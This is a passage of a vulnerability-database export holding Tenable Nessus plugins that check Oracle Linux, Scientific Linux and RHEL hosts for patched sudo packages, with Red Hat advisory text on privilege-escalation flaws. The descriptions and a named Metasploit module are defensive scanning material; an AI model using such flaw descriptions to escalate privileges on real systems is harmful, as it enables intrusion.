script_xref(name:\"RHSA\", value:\"2013:1701\");\n\n script_name(english:\"Oracle Linux 6 : sudo (ELSA-2013-1701)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Oracle Linux host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"From Red Hat Security Advisory 2013:1701 :\n\nAn updated sudo package that fixes two security issues, several bugs,\nand adds two enhancements is now available for Red Hat Enterprise\nLinux 6.\n\nThe Red Hat Security Response Team has rated this update as having low\nsecurity impact. Common Vulnerability Scoring System (CVSS) base\nscores, which give detailed severity ratings, are available for each\nvulnerability from the CVE links in the References section.\n\nThe sudo (superuser do) utility allows system administrators to give\ncertain users the ability to run commands as root.\n\nA flaw was found in the way sudo handled time stamp files. An attacker\nable to run code as a local user and with the ability to control the\nsystem clock could possibly gain additional privileges by running\ncommands that the victim user was allowed to run via sudo, without\nknowing the victim's password. (CVE-2013-1775)\n\nIt was found that sudo did not properly validate the controlling\nterminal device when the tty_tickets option was enabled in the\n/etc/sudoers file. An attacker able to run code as a local user could\npossibly gain additional privileges by running commands that the\nvictim user was allowed to run via sudo, without knowing the victim's\npassword. (CVE-2013-2776, CVE-2013-2777)\n\nThis update also fixes the following bugs :\n\n* Previously, sudo did not support netgroup filtering for sources from\nthe System Security Services Daemon (SSSD). Consequently, SSSD rules\nwere applied to all users even when they did not belong to the\nspecified netgroup. With this update, netgroup filtering for SSSD\nsources has been implemented. As a result, rules with a netgroup\nspecification are applied only to users that are part of the netgroup.\n(BZ#880150)\n\n* When the sudo utility set up the environment in which it ran a\ncommand, it reset the value of the RLIMIT_NPROC resource limit to the\nparent's value of this limit if both the soft (current) and hard\n(maximum) values of RLIMIT_NPROC were not limited. An upstream patch\nhas been provided to address this bug and RLIMIT_NPROC can now be set\nto 'unlimited'. (BZ#947276)\n\n* Due to the refactoring of the sudo code by upstream, the SUDO_USER\nvariable that stores the name of the user running the sudo command was\nnot logged to the /var/log/secure file as before. Consequently, user\nname 'root' was always recorded instead of the real user name. With\nthis update, the previous behavior of sudo has been restored. As a\nresult, the expected user name is now written to /var/log/secure.\n(BZ#973228)\n\n* Due to an error in a loop condition in sudo's rule listing code, a\nbuffer overflow could have occurred in certain cases. This condition\nhas been fixed and the buffer overflow no longer occurs. (BZ#994626)\n\nIn addition, this update adds the following enhancements :\n\n* With this update, sudo has been modified to send debug messages\nabout netgroup matching to the debug log. These messages should\nprovide better understanding of how sudo matches netgroup database\nrecords with values from the running system and what the values are\nexactly. (BZ#848111)\n\n* With this update, sudo has been modified to accept the ipa_hostname\nvalue from the /etc/sssd/sssd.conf configuration file when matching\nnetgroups. (BZ#853542)\n\nAll sudo users are advised to upgrade to this updated package, which\ncontains backported patches to correct these issues and add these\nenhancements.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2013-November/003813.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected sudo packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Mac OS X Sudo Password Bypass');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:sudo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:sudo-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:6\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2013/03/05\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/11/26\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/11/27\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nos_ver = pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Oracle Linux\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^6([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Oracle Linux 6\", \"Oracle Linux \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"EL6\", reference:\"sudo-1.8.6p3-12.el6\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"sudo-devel-1.8.6p3-12.el6\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"sudo / sudo-devel\");\n}\n", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-09-25T08:55:48", "description": "From Red Hat Security Advisory 2013:1353 :\n\nAn updated sudo package that fixes multiple security issues and\nseveral bugs is now available for Red Hat Enterprise Linux 5.\n\nThe Red Hat Security Response Team has rated this update as having low\nsecurity impact. Common Vulnerability Scoring System (CVSS) base\nscores, which give detailed severity ratings, are available for each\nvulnerability from the CVE links in the References section.\n\nThe sudo (superuser do) utility allows system administrators to give\ncertain users the ability to run commands as root.\n\nA flaw was found in the way sudo handled time stamp files. An attacker\nable to run code as a local user and with the ability to control the\nsystem clock could possibly gain additional privileges by running\ncommands that the victim user was allowed to run via sudo, without\nknowing the victim's password. (CVE-2013-1775)\n\nIt was found that sudo did not properly validate the controlling\nterminal device when the tty_tickets option was enabled in the\n/etc/sudoers file. An attacker able to run code as a local user could\npossibly gain additional privileges by running commands that the\nvictim user was allowed to run via sudo, without knowing the victim's\npassword. (CVE-2013-1776, CVE-2013-2776)\n\nThis update also fixes the following bugs :\n\n* Due to a bug in the cycle detection algorithm of the visudo utility,\nvisudo incorrectly evaluated certain alias definitions in the\n/etc/sudoers file as cycles. Consequently, a warning message about\nundefined aliases appeared. This bug has been fixed, /etc/sudoers is\nnow parsed correctly by visudo and the warning message no longer\nappears. (BZ#849679)\n\n* Previously, the 'sudo -l' command did not parse the /etc/sudoers\nfile correctly if it contained an Active Directory (AD) group. The\nfile was parsed only up to the first AD group information and then the\nparsing failed with the following message :\n\nsudo: unable to cache group ADDOM\\admingroup, already exists\n\nWith this update, the underlying code has been modified and 'sudo -l'\nnow parses /etc/sudoers containing AD groups correctly. (BZ#855836)\n\n* Previously, the sudo utility did not escape the backslash characters\ncontained in user names properly. Consequently, if a system used sudo\nintegrated with LDAP or Active Directory (AD) as the primary\nauthentication mechanism, users were not able to authenticate on that\nsystem. With this update, sudo has been modified to process LDAP and\nAD names correctly and the authentication process now works as\nexpected. (BZ#869287)\n\n* Prior to this update, the 'visudo -s (strict)' command incorrectly\nparsed certain alias definitions. Consequently, an error message was\nissued. The bug has been fixed, and parsing errors no longer occur\nwhen using 'visudo\n\n* s'. (BZ#905624)\n\nAll sudo users are advised to upgrade to this updated package, which\ncontains backported patches to correct these issues.", "edition": 17, "published": "2013-10-03T00:00:00", "title": "Oracle Linux 5 : sudo (ELSA-2013-1353)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-1775", "CVE-2013-1776", "CVE-2013-2776"], "modified": "2013-10-03T00:00:00", "cpe": ["p-cpe:/a:oracle:linux:sudo", "cpe:/o:oracle:linux:5"], "id": "ORACLELINUX_ELSA-2013-1353.NASL", "href": "https://www.tenable.com/plugins/nessus/70288", "sourceData": "#%NASL_MIN_LEVEL 80502\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2013:1353 and \n# Oracle Linux Security Advisory ELSA-2013-1353 respectively.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(70288);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/09/24\");\n\n script_cve_id(\"CVE-2013-1775\", \"CVE-2013-1776\", \"CVE-2013-2776\");\n script_bugtraq_id(58203, 58207);\n script_xref(name:\"RHSA\", value:\"2013:1353\");\n\n script_name(english:\"Oracle Linux 5 : sudo (ELSA-2013-1353)\");\n script_summary(english:\"Checks rpm output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Oracle Linux host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"From Red Hat Security Advisory 2013:1353 :\n\nAn updated sudo package that fixes multiple security issues and\nseveral bugs is now available for Red Hat Enterprise Linux 5.\n\nThe Red Hat Security Response Team has rated this update as having low\nsecurity impact. Common Vulnerability Scoring System (CVSS) base\nscores, which give detailed severity ratings, are available for each\nvulnerability from the CVE links in the References section.\n\nThe sudo (superuser do) utility allows system administrators to give\ncertain users the ability to run commands as root.\n\nA flaw was found in the way sudo handled time stamp files. An attacker\nable to run code as a local user and with the ability to control the\nsystem clock could possibly gain additional privileges by running\ncommands that the victim user was allowed to run via sudo, without\nknowing the victim's password. (CVE-2013-1775)\n\nIt was found that sudo did not properly validate the controlling\nterminal device when the tty_tickets option was enabled in the\n/etc/sudoers file. An attacker able to run code as a local user could\npossibly gain additional privileges by running commands that the\nvictim user was allowed to run via sudo, without knowing the victim's\npassword. (CVE-2013-1776, CVE-2013-2776)\n\nThis update also fixes the following bugs :\n\n* Due to a bug in the cycle detection algorithm of the visudo utility,\nvisudo incorrectly evaluated certain alias definitions in the\n/etc/sudoers file as cycles. Consequently, a warning message about\nundefined aliases appeared. This bug has been fixed, /etc/sudoers is\nnow parsed correctly by visudo and the warning message no longer\nappears. (BZ#849679)\n\n* Previously, the 'sudo -l' command did not parse the /etc/sudoers\nfile correctly if it contained an Active Directory (AD) group. The\nfile was parsed only up to the first AD group information and then the\nparsing failed with the following message :\n\nsudo: unable to cache group ADDOM\\admingroup, already exists\n\nWith this update, the underlying code has been modified and 'sudo -l'\nnow parses /etc/sudoers containing AD groups correctly. (BZ#855836)\n\n* Previously, the sudo utility did not escape the backslash characters\ncontained in user names properly. Consequently, if a system used sudo\nintegrated with LDAP or Active Directory (AD) as the primary\nauthentication mechanism, users were not able to authenticate on that\nsystem. With this update, sudo has been modified to process LDAP and\nAD names correctly and the authentication process now works as\nexpected. (BZ#869287)\n\n* Prior to this update, the 'visudo -s (strict)' command incorrectly\nparsed certain alias definitions. Consequently, an error message was\nissued. The bug has been fixed, and parsing errors no longer occur\nwhen using 'visudo\n\n* s'. (BZ#905624)\n\nAll sudo users are advised to upgrade to this updated package, which\ncontains backported patches to correct these issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2013-October/003701.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected sudo package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Mac OS X Sudo Password Bypass');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:sudo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:5\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2013/03/05\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/10/02\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/10/03\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nos_ver = pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Oracle Linux\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^5([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Oracle Linux 5\", \"Oracle Linux \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && \"ia64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"EL5\", reference:\"sudo-1.7.2p1-28.el5\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"sudo\");\n}\n", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-09-14T18:22:46", "description": "A flaw was found in the way sudo handled time stamp files. An attacker\nable to run code as a local user and with the ability to control the\nsystem clock could possibly gain additional privileges by running\ncommands that the victim user was allowed to run via sudo, without\nknowing the victim's password. (CVE-2013-1775)\n\nIt was found that sudo did not properly validate the controlling\nterminal device when the tty_tickets option was enabled in the\n/etc/sudoers file. An attacker able to run code as a local user could\npossibly gain additional privileges by running commands that the\nvictim user was allowed to run via sudo, without knowing the victim's\npassword. (CVE-2013-1776, CVE-2013-2776)\n\nThis update also fixes the following bugs :\n\n - Due to a bug in the cycle detection algorithm of the\n visudo utility, visudo incorrectly evaluated certain\n alias definitions in the /etc/sudoers file as cycles.\n Consequently, a warning message about undefined aliases\n appeared. This bug has been fixed, /etc/sudoers is now\n parsed correctly by visudo and the warning message no\n longer appears.\n\n - Previously, the 'sudo -l' command did not parse the\n /etc/sudoers file correctly if it contained an Active\n Directory (AD) group. The file was parsed only up to the\n first AD group information and then the parsing failed\n with the following message :\n\nsudo: unable to cache group ADDOM\\admingroup, already exists\n\nWith this update, the underlying code has been modified and 'sudo -l'\nnow parses /etc/sudoers containing AD groups correctly.\n\n - Previously, the sudo utility did not escape the\n backslash characters contained in user names properly.\n Consequently, if a system used sudo integrated with LDAP\n or Active Directory (AD) as the primary authentication\n mechanism, users were not able to authenticate on that\n system. With this update, sudo has been modified to\n process LDAP and AD names correctly and the\n authentication process now works as expected.\n\n - Prior to this update, the 'visudo -s (strict)' command\n incorrectly parsed certain alias definitions.\n Consequently, an error message was issued. The bug has\n been fixed, and parsing errors no longer occur when\n using 'visudo - -s'.", "edition": 14, "published": "2013-10-11T00:00:00", "title": "Scientific Linux Security Update : sudo on SL5.x i386/x86_64 (20130930)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-1775", "CVE-2013-1776", "CVE-2013-2776"], "modified": "2013-10-11T00:00:00", "cpe": ["p-cpe:/a:fermilab:scientific_linux:sudo-debuginfo", "x-cpe:/o:fermilab:scientific_linux", "p-cpe:/a:fermilab:scientific_linux:sudo"], "id": "SL_20130930_SUDO_ON_SL5_X.NASL", "href": "https://www.tenable.com/plugins/nessus/70392", "sourceData": "#%NASL_MIN_LEVEL 80502\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text is (C) Scientific Linux.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(70392);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/03/12\");\n\n script_cve_id(\"CVE-2013-1775\", \"CVE-2013-1776\", \"CVE-2013-2776\");\n\n script_name(english:\"Scientific Linux Security Update : sudo on SL5.x i386/x86_64 (20130930)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Scientific Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"A flaw was found in the way sudo handled time stamp files. An attacker\nable to run code as a local user and with the ability to control the\nsystem clock could possibly gain additional privileges by running\ncommands that the victim user was allowed to run via sudo, without\nknowing the victim's password. (CVE-2013-1775)\n\nIt was found that sudo did not properly validate the controlling\nterminal device when the tty_tickets option was enabled in the\n/etc/sudoers file. An attacker able to run code as a local user could\npossibly gain additional privileges by running commands that the\nvictim user was allowed to run via sudo, without knowing the victim's\npassword. (CVE-2013-1776, CVE-2013-2776)\n\nThis update also fixes the following bugs :\n\n - Due to a bug in the cycle detection algorithm of the\n visudo utility, visudo incorrectly evaluated certain\n alias definitions in the /etc/sudoers file as cycles.\n Consequently, a warning message about undefined aliases\n appeared. This bug has been fixed, /etc/sudoers is now\n parsed correctly by visudo and the warning message no\n longer appears.\n\n - Previously, the 'sudo -l' command did not parse the\n /etc/sudoers file correctly if it contained an Active\n Directory (AD) group. The file was parsed only up to the\n first AD group information and then the parsing failed\n with the following message :\n\nsudo: unable to cache group ADDOM\\admingroup, already exists\n\nWith this update, the underlying code has been modified and 'sudo -l'\nnow parses /etc/sudoers containing AD groups correctly.\n\n - Previously, the sudo utility did not escape the\n backslash characters contained in user names properly.\n Consequently, if a system used sudo integrated with LDAP\n or Active Directory (AD) as the primary authentication\n mechanism, users were not able to authenticate on that\n system. With this update, sudo has been modified to\n process LDAP and AD names correctly and the\n authentication process now works as expected.\n\n - Prior to this update, the 'visudo -s (strict)' command\n incorrectly parsed certain alias definitions.\n Consequently, an error message was issued. The bug has\n been fixed, and parsing errors no longer occur when\n using 'visudo - -s'.\"\n );\n # https://listserv.fnal.gov/scripts/wa.exe?A2=ind1310&L=scientific-linux-errata&T=0&P=934\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?b130a933\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected sudo and / or sudo-debuginfo packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Mac OS X Sudo Password Bypass');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:sudo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:sudo-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"x-cpe:/o:fermilab:scientific_linux\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2013/03/05\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/09/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/10/11\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Scientific Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Scientific Linux \" >!< release) audit(AUDIT_HOST_NOT, \"running Scientific Linux\");\nos_ver = pregmatch(pattern: \"Scientific Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Scientific Linux\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^5([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Scientific Linux 5.x\", \"Scientific Linux \" + os_ver);\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Scientific Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"SL5\", reference:\"sudo-1.7.2p1-28.el5\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"sudo-debuginfo-1.7.2p1-28.el5\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"sudo / sudo-debuginfo\");\n}\n", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-09-25T09:14:50", "description": "An updated sudo package that fixes multiple security issues and\nseveral bugs is now available for Red Hat Enterprise Linux 5.\n\nThe Red Hat Security Response Team has rated this update as having low\nsecurity impact. Common Vulnerability Scoring System (CVSS) base\nscores, which give detailed severity ratings, are available for each\nvulnerability from the CVE links in the References section.\n\nThe sudo (superuser do) utility allows system administrators to give\ncertain users the ability to run commands as root.\n\nA flaw was found in the way sudo handled time stamp files. An attacker\nable to run code as a local user and with the ability to control the\nsystem clock could possibly gain additional privileges by running\ncommands that the victim user was allowed to run via sudo, without\nknowing the victim's password. (CVE-2013-1775)\n\nIt was found that sudo did not properly validate the controlling\nterminal device when the tty_tickets option was enabled in the\n/etc/sudoers file. An attacker able to run code as a local user could\npossibly gain additional privileges by running commands that the\nvictim user was allowed to run via sudo, without knowing the victim's\npassword. (CVE-2013-1776, CVE-2013-2776)\n\nThis update also fixes the following bugs :\n\n* Due to a bug in the cycle detection algorithm of the visudo utility,\nvisudo incorrectly evaluated certain alias definitions in the\n/etc/sudoers file as cycles. Consequently, a warning message about\nundefined aliases appeared. This bug has been fixed, /etc/sudoers is\nnow parsed correctly by visudo and the warning message no longer\nappears. (BZ#849679)\n\n* Previously, the 'sudo -l' command did not parse the /etc/sudoers\nfile correctly if it contained an Active Directory (AD) group. The\nfile was parsed only up to the first AD group information and then the\nparsing failed with the following message :\n\nsudo: unable to cache group ADDOM\\admingroup, already exists\n\nWith this update, the underlying code has been modified and 'sudo -l'\nnow parses /etc/sudoers containing AD groups correctly. (BZ#855836)\n\n* Previously, the sudo utility did not escape the backslash characters\ncontained in user names properly. Consequently, if a system used sudo\nintegrated with LDAP or Active Directory (AD) as the primary\nauthentication mechanism, users were not able to authenticate on that\nsystem. With this update, sudo has been modified to process LDAP and\nAD names correctly and the authentication process now works as\nexpected. (BZ#869287)\n\n* Prior to this update, the 'visudo -s (strict)' command incorrectly\nparsed certain alias definitions. Consequently, an error message was\nissued. The bug has been fixed, and parsing errors no longer occur\nwhen using 'visudo\n\n* s'. (BZ#905624)\n\nAll sudo users are advised to upgrade to this updated package, which\ncontains backported patches to correct these issues.", "edition": 20, "published": "2013-10-01T00:00:00", "title": "RHEL 5 : sudo (RHSA-2013:1353)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-1775", "CVE-2013-1776", "CVE-2013-2776"], "modified": "2013-10-01T00:00:00", "cpe": ["cpe:/o:redhat:enterprise_linux:5", "p-cpe:/a:redhat:enterprise_linux:sudo-debuginfo", "p-cpe:/a:redhat:enterprise_linux:sudo"], "id": "REDHAT-RHSA-2013-1353.NASL", "href": "https://www.tenable.com/plugins/nessus/70249", "sourceData": "#%NASL_MIN_LEVEL 80502\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2013:1353. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(70249);\n script_version(\"1.14\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/09/24\");\n\n script_cve_id(\"CVE-2013-1775\", \"CVE-2013-1776\", \"CVE-2013-2776\");\n script_bugtraq_id(58203, 58207);\n script_xref(name:\"RHSA\", value:\"2013:1353\");\n\n script_name(english:\"RHEL 5 : sudo (RHSA-2013:1353)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"An updated sudo package that fixes multiple security issues and\nseveral bugs is now available for Red Hat Enterprise Linux 5.\n\nThe Red Hat Security Response Team has rated this update as having low\nsecurity impact. Common Vulnerability Scoring System (CVSS) base\nscores, which give detailed severity ratings, are available for each\nvulnerability from the CVE links in the References section.\n\nThe sudo (superuser do) utility allows system administrators to give\ncertain users the ability to run commands as root.\n\nA flaw was found in the way sudo handled time stamp files. An attacker\nable to run code as a local user and with the ability to control the\nsystem clock could possibly gain additional privileges by running\ncommands that the victim user was allowed to run via sudo, without\nknowing the victim's password. (CVE-2013-1775)\n\nIt was found that sudo did not properly validate the controlling\nterminal device when the tty_tickets option was enabled in the\n/etc/sudoers file. An attacker able to run code as a local user could\npossibly gain additional privileges by running commands that the\nvictim user was allowed to run via sudo, without knowing the victim's\npassword. (CVE-2013-1776, CVE-2013-2776)\n\nThis update also fixes the following bugs :\n\n* Due to a bug in the cycle detection algorithm of the visudo utility,\nvisudo incorrectly evaluated certain alias definitions in the\n/etc/sudoers file as cycles. Consequently, a warning message about\nundefined aliases appeared. This bug has been fixed, /etc/sudoers is\nnow parsed correctly by visudo and the warning message no longer\nappears. (BZ#849679)\n\n* Previously, the 'sudo -l' command did not parse the /etc/sudoers\nfile correctly if it contained an Active Directory (AD) group. The\nfile was parsed only up to the first AD group information and then the\nparsing failed with the following message :\n\nsudo: unable to cache group ADDOM\\admingroup, already exists\n\nWith this update, the underlying code has been modified and 'sudo -l'\nnow parses /etc/sudoers containing AD groups correctly. (BZ#855836)\n\n* Previously, the sudo utility did not escape the backslash characters\ncontained in 